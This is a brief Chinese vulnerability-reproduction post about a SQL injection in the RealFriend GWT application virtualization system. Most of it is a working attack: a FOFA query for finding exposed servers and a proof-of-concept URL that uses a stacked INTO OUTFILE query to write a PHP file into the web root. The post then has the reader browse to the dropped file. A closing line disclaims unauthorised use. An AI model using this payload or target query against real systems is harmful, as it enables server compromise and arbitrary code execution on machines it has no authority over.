漏洞复现 瑞友应用虚拟化系统 GetBSAppUrl SQL注入漏洞

0x01 漏洞描述

瑞友天翼应用虚拟化系统（GWT System）是国内具有自主知识产权的应用虚拟化平台，是基于服务器计算（Server-based Computing）的应用虚拟化平台。瑞友天翼应用虚拟化系统存在SQL注入漏洞。

0x02 漏洞复现

fofa-query: "CASMain.XGI?cmd=GetDirApp" && title=="瑞友应用虚拟化系统"

1.验证POC

/index.php?s=/Agent/GetBSAppUrl/AppID/')%3bselect+0x3c3f70687020706870696e666f28293b3f3e+into+outfile+%27C%3a\Program+Files+(x86)\RealFriend\Rap+Server\WebRoot\QWER.php%27%23/123

2.访问QWER.php，得到phpinfo页面

3.nuclei验证脚本已发表于知识星球

(注：本文章为技术分享，禁止任何非授权攻击行为)